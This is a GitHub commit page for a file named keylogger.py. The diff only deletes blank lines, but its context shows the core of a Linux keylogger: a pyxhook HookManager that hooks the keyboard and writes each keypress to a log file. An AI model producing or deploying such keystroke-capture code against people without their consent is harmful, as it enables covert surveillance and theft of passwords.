Skip to content

Commit bd62002

Browse files
author
mohamed larit
authored
keylogger
1 parent 8f105cf commit bd62002

File tree

1 file changed

+0
-3
lines changed

1 file changed

+0
-3
lines changed

keylogger.py

Lines changed: 0 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -33,9 +33,6 @@ def keypress(event):
3333
log.write(event.Key)
3434

3535
key=pyxhook.HookManager()
36-
3736
key.KeyDown=keypress
38-
3937
key.HookKeyboard()
40-
4138
key.start()

0 commit comments

Comments
 (0)